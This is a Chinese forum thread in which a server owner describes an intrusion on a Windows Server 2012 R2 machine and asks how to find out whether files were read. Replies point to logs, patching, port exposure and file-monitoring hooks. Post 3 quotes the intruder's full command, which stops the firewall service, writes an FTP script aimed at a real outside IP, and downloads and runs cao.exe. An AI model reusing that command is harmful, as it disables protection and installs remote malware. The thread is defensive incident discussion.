https://i.imgur.com/xiWGZ93.png
假设某台 Windows Server 2008R2 / 2012R2 被入侵了,
各位会使用什么方法判断某些文件是否被下载或读取过(比如 abc.txt 文件)?
Windows 的文件访问时间 感觉似乎不是我们通常理解的那样,
也即:只读访问后 它的时间属性不会有任何变化。
所以似乎无法通过文件访问时间 判断 abc.txt 这个文件是否被人访问或下载过?
还有其它可行的方法来判断吗?
1
wkl17 OP |
2
delectate 2019-02-27 06:31:43 +08:00
没用的,看这个毫无意义;一般是看日志,不过日志会被删除。要么恢复日志进行分析,要么文件加密让他下回去没意义(事后诸葛亮),别无他法。
|
3
wkl17 OP 或者更直接一点说吧。有一台作为远程桌面用的 Windows,没跑什么服务。
但我今天发现 cmd 命令行有些异常命令(因为执行某个不存在的 exe 卡住了,所以我通过 procexp 查看到这个异常命令)。 刚搜了一下,命令就像这个 2011 年的百度知道问题: https://zhidao.baidu.com/question/263547971.html 有个 cmd 尝试执行 ftp 命令行下载某个 exe 程序 并执行。但好在我服务器安装了普通的 HIPS, 根据 HIPS 软件的日志,已成功阻止了它下载。虽然也没什么重要数据,但我好奇的是, 这个入侵者能执行类似这样的命令:c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 117.41.184.58> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get cao.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&cao.exe 那服务器上的某个文件(比如刚才举例的 abc.txt )如果被入侵者下载或读取过,是否有办法判断出来? |
4
wkl17 OP @delectate 请再看看我上楼补充的内容。我粗看了 Windows 系统日志,应用程序、安全、系统 这 3 项日志没有发现什么明显异常的日志信息。而且文件读取记录肯定也不会记录在 Windows 系统日志的。服务器也没有跑 Web,所以 i 也没有 Web 日志。
我遇到的情况跟百度知道那个问题很像,也是先尝试 net1 stop sharedaccess (不过被 HIPS 阻止了)。 各位认为对方执行这样的命令,可能是通过什么漏洞来实现的? 服务器是 2K12 R2,除了 R2 的近 900MB 的补丁和 xx 月恶意软件删除工具 没打,其它的补丁很久以前都打过了。 因为也没跑 web,所以打了补丁后 也没做更多的优化,只是使用 HIPS 类软件控制联网(需手工放行) 但我刚才 netstat,发现 137、138、445 的端口还是处于监听状态。不过我也测试了从外网 telnet, 确认这几个端口无法从外网通讯。(应该是被防火墙挡下了)。 |
5
yw9381 2019-02-27 08:54:10 +08:00 via Android 1
基本判断。服务器已经是被入侵了。对方应该是用脚本批量化抓肉鸡之类的操作。个人猜测它对你服务器上应该什么都没动。而且下载这个 exe 的过程也被 HIPS 拦截了。
建议对服务器整体的安全做一个检查。去看看对外开放的端口(netstat -ano|findstr 0.0.0.0)。如果有用到 MSSQL 版本<=2005 请将 MSSQL 服务降权运行。打上最新的补丁(Windows Update 就可以) 具体环境还是要因机器而异。如果方便的话我还是希望能够看看定位一下具体问题然后再做处理 有其他的安全上的问题可以继续讨论 |
6
mmdsun 2019-02-27 12:37:52 +08:00 via Android
系统打了补丁黑进去可能性极低。应该是安装的软件有漏洞,比如 Redis,IIS 之类的。建议用标准账户。管理员账户上锁。
|
7
QQ2171775959 2019-02-27 13:53:15 +08:00
看一下服务器的日志吧。
|
8
CallMeReznov 2019-02-27 13:57:05 +08:00
3389 端口也得改,我前几天就因为这个中招了 7-8 台机器都挂了
|
9
visonme 2019-02-27 14:03:18 +08:00
你说的这些都是在应用层可以被清空修改的东西,就算有保留,你看到的也不一定就是真实的数据。
怎么看不清楚,或许需要交给专业的安全人士 如果从开发角度来说,有两种方式可以达到监控,一个是 hook 相关的操作 API,然后记录,另一种通过文件监控驱动实 |
10
wkl17 OP @yw9381
@mmdsun @QQ2171775959 @CallMeReznov @visonme 没有跑 Web 服务,MySQL 当时也没运行,而且我通过 HIPS 工具阻止了从公网访问 3306。默认的 3389 也早就改掉了。 或者,假如想分析对方究竟是利用什么漏洞来入侵的,各位可有分析的方法或工具分享一下?谢谢。 |
11
yw9381 2019-02-28 00:17:38 +08:00 via Android
@wkl17 这个就得具体看服务器上跑了什么业务。需要做一些可能牵扯取证及攻击朔源的工作。做攻击行为分析。如果可能的话。我还是比较希望能够以远程的形式接入服务器看看到底对方是怎么搞的。找出问题根本在哪
|
12
wkl17 OP @yw9381 感谢!感觉入口应该还是 Windows 的组件。我暂时先将一些服务关闭了,再观察看看。
WinRM、MSMQ、lmhosts(NetBIOS)、ScDeviceEnum(SmartCard 相关服务) 我很早以前也安装了实时流量统计工具,但是它的功能比较简单,虽然可以查看所有历史流量。 绝大多数流量是 svchost.exe 产生的,但是我使用 rdp 连接,流量应该也被包含在内。所以无法单独统计 rdp 究竟占用了多少流量。否则应该就能逆向分析我这个问题了。 各位如果哪位知道有什么办法 可以精确统计 Windows 各组件通过 svchost.exe 进程产生的流量,请分享一下方法。 |
13
yw9381 2019-03-01 02:31:10 +08:00 via Android
我觉得根本问题还是要先排查可能的途径。单纯流量意义不大。而且对方用你机器做什么你也不知道。更别说一些 rootkit 技术或是混淆伪装之类你根本看不出来的方法
|
14
opengps 2019-03-23 08:05:55 +08:00 via Android
本机写个监控,记录日志。。。
|